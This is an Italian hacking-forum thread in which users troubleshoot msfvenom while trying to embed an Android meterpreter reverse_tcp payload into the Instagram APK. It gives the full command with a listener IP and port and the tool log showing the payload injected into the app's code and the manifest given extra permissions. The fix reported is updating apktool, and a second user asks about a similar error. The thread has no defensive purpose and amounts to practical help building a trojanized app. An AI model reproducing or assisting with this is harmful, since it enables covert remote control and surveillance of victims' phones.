Domanda Risolto Malware msfvenom error "Error: Unable to rebuild apk with apktool"

steve0111

Utente Bronze
21 Giugno 2017
51
11
2
39
Ultima modifica:
Ciao, ho un problema con masfvenom, come si può intuire da titolo, semplicemente quando lancio il comando "msfvenom -x instagram.apk -p android/meterpreter/reverse_tcp lhost=ip_macchina lport=porta_tcp -o instagram1.apk", premetto che ho installato apktool, l'ultima versione disponibile, ma mi fa vedere la versione 2.2.2 in ogni caso, spero possiate aiutarmi, mi restituisce il seguente errore

Codice:
Using APK template: instagram.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[] Creating signing key and keystore..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating hook point..
[] Adding payload as package com.instagram.android.vehdh
[] Loading /tmp/d20180726-8494-1rzbkw3/original/smali/com/instagram/app/InstagramAppShell.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[*] Rebuilding instagram.apk with meterpreter injection as /tmp/d20180726-8494-1rzbkw3/output.apk
Error: Unable to rebuild apk with apktool
Messaggio unito automaticamente:

ok adesso sono riuscito ad aggiornare apktool, cambiando lo script vecchio con quello aggiornato e sostituento il file apktool.jar

Per maggiori informazioni: https://t.me/Stefano01101
 
Ciao, ho il tuo stesso problema, potresti dirmi nei dettagli come hai risolto? inoltre a volte mi da questo errore

Error: No such file or directory @ rb_sysopen - /tmp/d20180905-10053-12ixswv/aligned.apk

potresti aiutarmi?